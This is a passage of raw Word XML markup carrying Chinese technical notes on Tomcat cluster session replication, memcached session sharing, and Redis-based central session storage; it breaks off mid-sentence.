      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SESSION</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的时候要特别注意，避免出现</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SESSION</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>无法同步的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00F37684">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="009C77FA" w:rsidP="00F37684">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>组播问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00F37684">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>http://www.mzone.cc/article/328.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00F37684">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00F37684">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的集群复制中，分为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>DeltaManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>BackupManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>两种，前者适合于小型系统，任何情况下，均进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>复</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>制，消耗大量资源。所以，我们应该采用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>BackupManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，仅在需要的时候</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>挂掉的时候</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>复制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="0088721D" w:rsidP="0088721D">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6.8.1.2</w:t>
      </w:r>
      <w:r w:rsidR="0036322E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>memcached</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>共享</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00F37684">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>集中存储，存储介质可以是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>NFS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>文件系统、数据库、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>memcached</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>memcached</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>性能最好。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00F37684">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Memcached</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>来存储</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> session </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在读写速度上会比文件快很多，而且在多个服务器需要共用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>时会比较方便，将这些服务器都配置成使用同一组</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Memcached</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>服务器就可以，减少了额外的工作量。缺点是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> session </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据都保存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中，持久化方面有所欠缺，但对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> session </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据来说也不是很大的问题，如果要持久化数据，也可以使用新浪开发的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MemcacheDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>或日本人开发的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Tokyo tyrant+Tokyo Cabinet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007429D4" w:rsidRPr="00F41A4C" w:rsidRDefault="007429D4" w:rsidP="007429D4">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6.8.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A2543">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:r w:rsidR="004A2543">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>redis</w:t>
      </w:r>
      <w:r w:rsidR="004A2543">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r w:rsidR="004A2543">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidR="004A2543">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的集中存储</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRDefault="009E3923" w:rsidP="00F37684">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="eastAsia"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>浏览器进程访问需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>支持的资源，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JSP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Servlet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等。一般情况下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"gif", "jpg", "bmp", "png","html", "htm", "js", "css", "mp4"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等这些资源用户访问时不需要创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象。为了维持客户端与服务端的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>连接状态，服务端会在向客户端的响应信息增加一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cookies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
